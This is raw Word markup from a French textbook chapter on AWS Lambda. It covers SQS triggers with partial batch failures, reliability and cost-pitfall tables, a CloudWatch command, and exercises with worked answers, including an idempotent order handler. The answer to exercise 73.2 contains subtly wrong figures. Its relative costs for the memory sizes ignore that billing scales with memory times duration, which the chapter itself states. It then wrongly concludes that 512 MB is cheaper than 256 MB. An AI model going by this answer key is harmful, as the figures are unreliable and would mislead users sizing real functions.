          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="86" name="Picture 86"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f84.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.84 — Une chaîne fiable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un déclencheur avec échecs partiels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Déclencheur SQS avec traitement par lots</w:t>
        <w:br/>
        <w:t>aws lambda create-event-source-mapping \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --function-name traiter-commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --event-source-arn arn:aws:sqs:eu-west-3:123456789012:commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --batch-size 10 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --maximum-batching-window-in-seconds 5 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --function-response-types ReportBatchItemFailures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ReportBatchItemFailures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de ne réessayer que les messages en échec : sans cette option, tout le lot est rejoué et les messages valides sont traités deux fois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.274 — Cinq mécanismes de fiabilité</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8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Mécanisme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Protège contre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Perte d'événement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence supplémentaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Idempotence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Doublons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Nécessite une clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lettre morte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boucle infinie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rejeu manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Limite de concurrence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Saturation aval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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File d'attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Délai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendance lente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échec explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>73.5 Coût et pièges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La facturation à l'usage est avantageuse pour une charge irrégulière, défavorable pour une charge constante. Quelques pièges suffisent à multiplier la facture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.275 — Cinq pièges de coût</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8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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boucle de réessai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Facture et erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lettre morte, idempotence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Paquet géant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Démarrages à froid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Dépendances minimales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attente active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Durée facturée élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Événements plutôt que boucles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Concurrence non limitée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Saturation de la base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Quota réservé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Journaux verbeux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coût de stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Niveaux et rétention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mesure de durée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Surveiller les erreurs et la durée</w:t>
        <w:br/>
        <w:t>aws cloudwatch get-metric-statistics \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --namespace AWS/Lambda --metric-name Duration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dimensions Name=FunctionName,Value=api \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --start-time 2026-10-01T00:00:00Z --end-time 2026-10-02T00:00:00Z \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --period 3600 --statistics Average Maximum</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AVANT D'ADOPTER LE SERVERLESS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La charge est-elle irrégulière ou faible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La durée d'exécution reste-t-elle sous la limite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Les dépendances tiennent-elles dans un paquet raisonnable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Les traitements sont-ils idempotents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 coût à charge constante a-t-il été comparé ?</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serverless facture à l'invocation et à la durée.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initialisations hors gestionnaire réduisent la latence.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fonction peut être exécutée plusieurs fois : l'idempotence est obligatoire.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mémoire allouée détermine aussi le processeur.</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concurrence se limite pour protéger les dépendances.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file de lettres mortes évite la perte silencieuse.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ReportBatchItemFailures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite de rejouer tout un lot.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charge constante coûte souvent moins cher en permanence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les fonctions s'exécutent. Le chapitre suivant décrit l'infrastructure comme du code, avec Terraform.</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73.1 — Rendre une fonction idempotente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 traitement de commande peut être rejoué après un délai dépassé.</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Ajoutez une clé d'idempotence.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Vérifiez avant de traiter.</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Consignez le résultat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 73.2 — Choisir la mémoire optimale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Le réglage par défaut coûte cher sans être rapide.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Mesurez plusieurs niveaux.</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Calculez le coût par invocation.</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Choisissez le meilleur compromis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 73.3 — Concevoir une chaîne fiable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier déposé doit déclencher un traitement d'image.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Passez par une file.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Gérez les échecs partiels.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Prévoyez un rejeu.</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73.1</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async function traiterCommande(commande) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const cle = commande.id;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const existante = await db.query(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT statut FROM commandes WHERE idempotency_key = $1", [cle]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t>if (existante.rowCount) return { statut: existante.rows[0].statut, rejoue:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    true };</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  await db.query(</w:t>
        <w:br/>
        <w:t>"INSERT INTO commandes (idempotency_key, montant, statut) VALUES</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ($1,$2,'en_cours')",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [cle, commande.montant]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const resultat = await paiement.debiter(commande);</w:t>
        <w:br/>
        <w:t>await db.query("UPDATE commandes SET statut = $1 WHERE idempotency_key = $2",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [resultat.statut, cle]);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  return { statut: resultat.statut, rejoue: false };</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La clé est fournie par la source de l'événement, pas générée dans la fonction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le statut intermédiaire permet de distinguer un traitement en cours d'un traitement terminé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 73.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Relevé de mesures</w:t>
        <w:br/>
        <w:t># 256 Mo  : 1 200 ms → coût relatif 1.00</w:t>
        <w:br/>
        <w:t># 512 Mo  :   700 ms → coût relatif 0.58</w:t>
        <w:br/>
        <w:t># 1024 Mo :   480 ms → coût relatif 0.80</w:t>
        <w:br/>
        <w:t># 2048 Mo :   420 ms → coût relatif 1.40</w:t>
        <w:br/>
        <w:br/>
        <w:t># Le meilleur compromis est 512 Mo : plus rapide et moins cher que 256 Mo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
